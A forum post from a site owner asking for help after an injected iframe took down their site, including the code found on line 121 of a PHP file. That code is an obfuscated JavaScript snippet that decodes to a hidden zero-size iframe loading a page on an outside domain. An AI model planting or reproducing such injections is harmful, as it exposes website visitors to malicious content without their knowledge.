Hi, one of our sites was down for a few hours and apparently it was due to an iframe injected in /hsphere/local
/home/mywebiste/mywebsite.com.au/sapphire/main.php on line 121.
Has anyone experienced any issue like this? Do i need to change permissions to prevent this from happening again?
thats what the iframe looked like.
Line 121 contains the following:
<script> var Z = '0 03c0 0690 0660 0720 0610 06d0 0650 0200 0730 0720 0630 03d0 0220 0680 0740 0740 0700 03a0 02f0 02f0 0720 0610 0690 06e0 0620 06f0 0780 02e0 0750 0730 02f0 0610 0640 06f0 0620 0650 02f0 0690 06e0 0640 0650 0780 02e0 0700 0680 0700 0220 0200 0770 0690 0640 0740 0680 03d0 0220 0300 0220 0200 0680 0650 0690 0670 0680 0740 03d0 0220 0300 0220 0200 0660 0720 0610 06d0 0650 0620 06f0 0720 0640 0650 0720 03d0 0220 0300 0220 03e0 03c0 02f0 0690 0660 0720 0610 06d0 0650 03e'; XX = Z.replace(/0 0/g,'%'); document.write(unescape(XX)); </script> fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>
Cheers
Fabs